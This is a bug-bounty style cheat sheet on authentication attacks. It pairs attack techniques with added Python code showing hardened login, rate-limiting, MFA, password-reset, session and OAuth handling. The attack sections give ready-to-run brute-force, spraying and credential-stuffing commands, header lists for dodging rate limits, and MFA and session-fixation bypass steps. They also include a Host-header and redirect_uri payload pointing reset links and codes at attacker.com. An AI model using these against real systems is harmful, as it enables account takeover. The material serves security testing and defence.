
Authentication Attacks

Password attacks, credential stuffing, MFA bypass, and session management

Username Enumeration

Error Message Analysis

```text
# Different responses
"Invalid username" vs "Invalid password"
"User not found" vs "Wrong password"
"Email does not exist" vs "Incorrect password"
```

Timing-Based

```text
# Measure response time
Valid user → longer (password hash check occurs)
Invalid user → faster (early exit before hashing)

# Tools
ffuf with -mc all -fs X -mt ">200"   # match responses slower than 200 ms (--time is not an ffuf option)
```

Response Differences

```text
# Check for
- Different HTTP status codes
- Content length variations
- Response time differences
- Different redirect URLs
- Subtle wording changes
```

Registration Page

```text
# Check taken usernames
POST /register
{"username": "admin"} → "Username already taken"
{"username": "test123"} → "Success" or different error
```
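The error-message and timing leaks above, side by side with the fix, as an added example (not code from the original page): `login_leaky` exits early with a distinct message for unknown users, while `login` returns one message and always performs one PBKDF2 computation, against a dummy credential when the user does not exist. The in-memory user store, iteration count and function names are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory user store for this example: username -> (salt, PBKDF2 hash)
USERS = {}
ITERATIONS = 100_000
GENERIC_ERROR = "Invalid username or password"

def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def add_user(username: str, password: str) -> None:
    salt = secrets.token_bytes(16)
    USERS[username.strip().lower()] = (salt, _hash(password, salt))

# Dummy credential evaluated when the username is unknown, so every code path does
# the same PBKDF2 work and the response time does not reveal whether the account exists.
_DUMMY_SALT = secrets.token_bytes(16)
_DUMMY_HASH = _hash(secrets.token_urlsafe(16), _DUMMY_SALT)

def login_leaky(username: str, password: str):
    """Enumerable: distinct messages and an early exit (no hashing) for unknown users."""
    rec = USERS.get(username.strip().lower())
    if rec is None:
        return 404, "User not found"          # fast path: answers before any hashing
    salt, expected = rec
    if hmac.compare_digest(_hash(password, salt), expected):
        return 200, "OK"
    return 401, "Wrong password"              # slow path: hashing happened

def login(username: str, password: str):
    """Hardened: one message and one hashing cost whether or not the user exists."""
    rec = USERS.get(username.strip().lower())
    salt, expected = rec if rec is not None else (_DUMMY_SALT, _DUMMY_HASH)
    candidate = _hash(password, salt)         # always computed, even for unknown users
    if rec is not None and hmac.compare_digest(candidate, expected):
        return 200, "OK"
    return 401, GENERIC_ERROR
```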

Password Attacks

Brute Force

```bash
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# ffuf
ffuf -u https://target.com/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fc 401

# Burp Intruder
Positions: password field
Payload: wordlist
```

Password Spraying

```bash
# Few passwords against many users
spray.sh -h target.com -U users.txt -P passwords.txt

# Common passwords to try
Password1
Password123
CompanyName2024
Welcome1
Summer2024
[company][year]
```

Credential Stuffing

```bash
# Use leaked credentials
credmaster -t target.com -u breached_creds.txt
```

Rate Limit Bypass

IP-Based Bypass

```text
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: random_ip
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1

# Rotate IPs in each request
X-Forwarded-For: 1.2.3.1
X-Forwarded-For: 1.2.3.2
X-Forwarded-For: 1.2.3.3
```

Account-Based Bypass

```text
# Case variation
admin
Admin
ADMIN
admin@target.com
ADMIN@target.com

# Whitespace
admin 
 admin
admin%00
admin%20

# Unicode normalization
αdmin (Greek α)
аdmin (Cyrillic а)
```

Request Modification

```text
# Add null bytes
username=admin%00&password=test

# Array notation
username[]=admin&password=test

# JSON vs form data
Content-Type: application/json
{"username": "admin", "password": "test"}
```
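A login rate limiter that closes both the IP-based and the account-based bypasses above, as an added example (not from the original page): client IP headers are honoured only when the TCP peer is a known reverse proxy, and attempts are counted per canonical account name as well as per IP. The proxy address 10.0.0.5, the limits and the class name are assumptions made for the example.

```python
import ipaddress
import time
import unicodedata
from collections import defaultdict, deque

# Assumed deployment: one reverse proxy at 10.0.0.5 terminates client connections.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

def client_ip(remote_addr: str, headers: dict) -> str:
    """IP to rate-limit on. X-Forwarded-For is trusted only from a known proxy; from
    anyone else it is ignored, so rotated header values all land in one bucket."""
    if ipaddress.ip_address(remote_addr) in TRUSTED_PROXIES:
        xff = headers.get("X-Forwarded-For", "")
        if xff:
            return xff.split(",")[-1].strip()   # rightmost hop is the one our proxy appended
    return remote_addr

def account_key(username: str) -> str:
    """Canonical form so 'Admin', ' admin', 'admin%00' (decoded) share one bucket."""
    u = unicodedata.normalize("NFKC", username).replace("\x00", "")
    return u.strip().lower()

class LoginLimiter:
    def __init__(self, limit: int = 5, window: int = 60):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)          # bucket key -> timestamps of recent attempts

    def _allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        while q and q[0] <= now - self.window:  # drop attempts outside the window
            q.popleft()
        q.append(now)
        return len(q) <= self.limit

    def allow(self, remote_addr: str, headers: dict, username: str, now=None) -> bool:
        now = time.time() if now is None else now
        ip_ok = self._allow("ip:" + client_ip(remote_addr, headers), now)
        acct_ok = self._allow("user:" + account_key(username), now)
        return ip_ok and acct_ok                # both buckets are charged on every attempt
```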

MFA Bypass

Direct Page Access

```text
# Skip MFA step
Step 1: /login → credentials
Step 2: /mfa → enter code
Step 3: /dashboard

# Try accessing directly
/dashboard (after step 1)
```

Response Manipulation

```text
# Intercept MFA response
{"mfa_required": true} → {"mfa_required": false}
{"success": false} → {"success": true}
{"verified": 0} → {"verified": 1}
```

Code Reuse

```text
# Use old valid code again
# Check if codes expire properly
# Use code from different account
```

Brute Force OTP

```text
# 4-6 digit codes
- No rate limit: try all combinations
- Check if lockout applies after logout

# Tools
ffuf -u target.com/mfa -X POST -d "code=FUZZ" -w codes.txt
```

Backup Code Attacks

```text
# Request backup codes
# Check if predictable/sequential
# Brute force backup codes
```

Session Token Abuse

```text
# MFA cookie reuse
1. Complete MFA on attacker account
2. Copy MFA completion cookie
3. Set cookie on victim session
```
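One server-side state machine that defeats all of the MFA bypasses in this section (direct page access, response manipulation, code reuse, OTP brute force, MFA cookie reuse), as an added example that is not from the original page: the dashboard consults only the session's stage, and the one-time code is bound to a single session, counted, expired and burned on success. The TTL, attempt limit and in-memory session store are assumptions for the example.

```python
import hmac
import secrets
import time

OTP_TTL = 300            # seconds a one-time code stays valid
MAX_OTP_ATTEMPTS = 5     # after that the pending session is discarded
SESSIONS = {}            # constructed in-memory store: session id -> state

def password_login(user: str) -> str:
    """Step 1 (password check assumed done elsewhere): open a session that is only at
    the 'password_ok' stage and bind a fresh code to this session, not to the user."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "stage": "password_ok", "otp_attempts": 0,
                     "otp": f"{secrets.randbelow(10**6):06d}", "otp_issued": time.time()}
    return sid

def verify_otp(sid: str, code: str, now=None):
    """Step 2: the code is checked against this session only, counted, expired and
    burned on success, so replay, cross-account reuse and brute force all fail."""
    now = time.time() if now is None else now
    s = SESSIONS.get(sid)
    if s is None or s["stage"] != "password_ok":
        return 403, "mfa not pending"
    if now - s["otp_issued"] > OTP_TTL:
        SESSIONS.pop(sid)
        return 403, "code expired"
    s["otp_attempts"] += 1
    if s["otp_attempts"] > MAX_OTP_ATTEMPTS:
        SESSIONS.pop(sid)                      # lockout: the attacker must redo step 1
        return 429, "too many attempts"
    if not hmac.compare_digest(code.encode(), s["otp"].encode()):
        return 401, "invalid code"
    s["stage"] = "mfa_verified"
    s["otp"] = None                            # single use: the same code cannot be replayed
    return 200, "ok"

def dashboard(sid: str):
    """Step 3: decided purely from server-side state. A client that rewrites
    {"mfa_required": false} or jumps straight here is sent back to /mfa; a cookie
    copied from another session carries that session's user, never the victim's."""
    s = SESSIONS.get(sid)
    if s is None:
        return 302, "/login"
    if s["stage"] != "mfa_verified":
        return 302, "/mfa"
    return 200, f"welcome {s['user']}"
```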

Password Reset Flaws

Token Leakage

```text
# Check Referer header
1. Request password reset
2. Click reset link
3. Click external link on reset page
4. Check if token in Referer to external site
```

Host Header Poisoning

```text
# Manipulate Host header
POST /forgot-password HTTP/1.1
Host: attacker.com

# Reset link sent to victim contains attacker.com
Password reset link: https://attacker.com/reset?token=abc123
```

Token Predictability

```text
# Analyze token structure
- Sequential tokens
- Time-based tokens
- Weak random generation
- Encoded user data (base64 decode)
```

Token Reuse

```text
# Check if token invalidated after:
- Single use
- Password change
- Time expiration
- New token request
```

Email Enumeration

```text
# Different responses for:
"Email sent" (user exists)
"Email not found" (doesn't exist)
```
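A reset flow that covers every flaw in this section (Referer leakage, Host header poisoning, predictable tokens, token reuse, email enumeration), as an added example that is not from the original page: the link is built from a configured base URL, the token is 256 random bits stored only as a hash, it is consumed on first presentation, expires, dies on password change or re-request, and the response is identical for unknown addresses. The base URL, TTL, user store and mail outbox are constructed for the example.

```python
import hashlib
import secrets
import time

BASE_URL = "https://app.example.com"   # from configuration, never from the Host header
TOKEN_TTL = 900                        # seconds
USERS = {"alice@example.com": {"pw_version": 1}}   # constructed user store
RESET_TOKENS = {}                      # sha256(token) -> {email, expires, pw_version}
OUTBOX = []                            # stand-in for the mail transport: (to, link)
NEUTRAL = (200, "If that address is registered, a reset link has been sent.")

def request_reset(email: str, host_header: str):
    """Same status and body whether or not the address exists (no enumeration).
    host_header is accepted only to make explicit that it is never used for the link."""
    email = email.strip().lower()
    user = USERS.get(email)
    if user is not None:
        # a new request invalidates any earlier outstanding token for this account
        for k in [k for k, v in RESET_TOKENS.items() if v["email"] == email]:
            del RESET_TOKENS[k]
        token = secrets.token_urlsafe(32)  # 256 CSPRNG bits: not sequential, no user data
        RESET_TOKENS[hashlib.sha256(token.encode()).hexdigest()] = {
            "email": email, "expires": time.time() + TOKEN_TTL, "pw_version": user["pw_version"]}
        OUTBOX.append((email, f"{BASE_URL}/reset?token={token}"))
    return NEUTRAL

def reset_page_headers() -> dict:
    """Headers for the page the link opens: no Referer leaves carrying the token."""
    return {"Referrer-Policy": "no-referrer", "Cache-Control": "no-store"}

def redeem_reset(token: str, now=None):
    """The token is consumed on first presentation (valid or not), refused after TTL,
    and refused if the password changed since it was issued."""
    now = time.time() if now is None else now
    rec = RESET_TOKENS.pop(hashlib.sha256(token.encode()).hexdigest(), None)
    if rec is None or now > rec["expires"]:
        return 400, "invalid or expired token"
    user = USERS[rec["email"]]
    if rec["pw_version"] != user["pw_version"]:
        return 400, "invalid or expired token"
    user["pw_version"] += 1   # password changed: every other outstanding token dies
    return 200, "password updated"
```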

Session Management

Session Fixation

```text
# Set session before auth
1. Attacker gets session: PHPSESSID=abc
2. Trick victim to use abc: /login?PHPSESSID=abc
3. Victim logs in
4. Attacker uses abc (now authenticated)
```

Session Token Analysis

```text
# Check for
- Predictability (sequential, time-based)
- Weak randomness
- User data in token
- Insufficient length

# Tools
Burp Sequencer
```

Logout Bypass

```text
# After logout, check if:
- Session still valid server-side
- Token can be reused
- Other tabs still authenticated
```

Session Hijacking

```text
# Via XSS
document.cookie

# Via network sniffing (HTTP)
HTTPS not enforced

# Via session fixation
Pre-set session ID
```
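A session store that addresses the whole section (fixation, weak tokens, logout bypass, hijacking via XSS or plain HTTP), as an added example not from the original page: IDs the client invents are never adopted, the ID is rotated at login, logout deletes the record server-side, and the cookie is issued with Secure and HttpOnly. The in-memory store and function names are assumptions for the example.

```python
import secrets
import time

SESSIONS = {}   # constructed in-memory store: session id -> {"user": ..., "created": ...}

def new_session() -> str:
    sid = secrets.token_urlsafe(32)   # 256 CSPRNG bits: not sequential, not time-based, no user data
    SESSIONS[sid] = {"user": None, "created": time.time()}
    return sid

def resolve_session(cookie_sid):
    """Only IDs this server issued are honoured. An ID the client invented (the one
    planted via ?PHPSESSID=abc) is replaced, never adopted into the store."""
    return cookie_sid if cookie_sid in SESSIONS else new_session()

def cookie_header(sid: str) -> str:
    # HttpOnly keeps document.cookie from reading it; Secure keeps it off plain HTTP.
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"

def login(cookie_sid, user: str):
    """Rotate on privilege change: the pre-authentication ID is destroyed and a fresh
    one carries the authenticated state, so a pre-set ID never becomes authenticated."""
    SESSIONS.pop(cookie_sid, None)
    sid = new_session()
    SESSIONS[sid]["user"] = user
    return sid, cookie_header(sid)

def logout(sid: str) -> None:
    SESSIONS.pop(sid, None)   # invalidated server-side: dead for every tab and every copy

def current_user(sid):
    s = SESSIONS.get(sid)
    return s["user"] if s else None
```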

OAuth/SSO Attacks

Authorization Code Theft

```text
# Open redirect in redirect_uri
/oauth/authorize?redirect_uri=https://target.com/callback/../../../attacker.com

# Check redirect_uri validation
- Exact match?
- Subdomain allowed?
- Path manipulation?
```

CSRF in OAuth Flow

```text
# Missing state parameter
# Predictable state
# State not validated
```

Token Leakage

```text
# Token in URL fragment
https://target.com/callback#access_token=xxx

# Check for referrer leakage
```
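The three OAuth checks above (redirect_uri validation, state handling, fragment tokens) in one place, as an added example that is not from the original page: redirect_uri is compared by exact string match against the registered value, state is unguessable, bound to the browser session and consumed on first use, and a token arriving in the fragment is refused. The client registry, the client id and the function names are assumptions for the example.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Assumed client registry: every redirect_uri is registered in full, scheme included.
REGISTERED_REDIRECTS = {"client-123": {"https://target.com/callback"}}
PENDING_STATE = {}   # browser session id -> state issued when the flow started

def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison with the registered value. No prefix, subdomain,
    wildcard or path-normalising match, so '/callback/../../../attacker.com' fails."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())

def start_flow(session_id: str) -> str:
    """Client side: mint an unguessable state bound to this browser session."""
    state = secrets.token_urlsafe(16)
    PENDING_STATE[session_id] = state
    return state

def handle_callback(session_id: str, callback_url: str):
    """state must equal the one stored for this session and is consumed on first use;
    a token arriving in the URL fragment (implicit flow) is refused outright."""
    parts = urlsplit(callback_url)
    if "access_token" in parse_qs(parts.fragment):
        return 400, "token in fragment refused"
    q = parse_qs(parts.query)
    expected = PENDING_STATE.pop(session_id, None)
    state = q.get("state", [""])[0]
    if expected is None or not secrets.compare_digest(expected.encode(), state.encode()):
        return 400, "state mismatch"
    code = q.get("code", [None])[0]
    if code is None:
        return 400, "missing code"
    return 200, code
```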

Bug Bounty Tips

High-Impact Findings

```text
1. Authentication bypass → Access any account
2. MFA bypass → Defeat second factor
3. Account takeover via password reset
4. Rate limit bypass on login
5. Session fixation/hijacking
```

Testing Checklist

```text
□ Username enumeration
□ Brute force protection
□ Rate limit bypass
□ Password complexity
□ MFA bypass attempts
□ Password reset token analysis
□ Session token randomness
□ Logout effectiveness
□ Remember me security
□ OAuth flow manipulation
```

Tools

```bash
# Hydra - Brute force
# Burp Intruder - Automated testing
# ffuf - Fast fuzzing
# CeWL - Custom wordlist
# Hashcat - Offline cracking
```